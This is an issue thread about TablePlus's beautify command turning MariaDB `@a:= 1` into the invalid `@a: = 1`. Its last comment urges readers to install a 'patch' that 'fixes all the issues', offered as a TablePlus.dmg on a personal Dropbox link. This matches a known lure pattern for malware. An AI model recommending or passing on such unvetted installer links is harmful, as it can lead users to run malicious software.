### ISSUE TITLE
Beautify formatting MariaDB SQL Variable assignments incorrectly

### ISSUE THREAD

**Issue by RileyEv** [TablePlus/TablePlus#1347]
1. Which driver are you using and version of it (Ex: PostgreSQL 10.0): MariaDB 10.3.16

2. Which TablePlus build number are you using (the number on the welcome screen, Ex: build 81): Version 2.8.1 (252)

3. The steps to reproduce this issue: The formatting a query that has `@a:= 1` if you then run the beautify command it formats it as `@a: = 1` This is not correct SQL syntax and returns a syntax error from the data base

**Comment by huyphams** [comment]
Hey @RileyEv I just wanna confirm that the `@a := 1` is corrected after beautify. But the `@a:= 1` could cause the bug.

**Comment by RileyEv** [comment]
Yes you are correct it is `@a:= 1` that was a typo. I've updated the issue to fix that.

**Comment by HardyLi9999** [comment]
I met with the same issue. Is there any one to fix it?

**Comment by huyphams** [comment]
Hi if you have a chance, you could try this patch, it fixes all the issues:
https://www.dropbox.com/scl/fi/rnzl329j9llknuoj0c0h1/TablePlus.dmg?rlkey=fykl1eshbl1ylnn48s5ic7rau&st=00mt04zi&dl=0
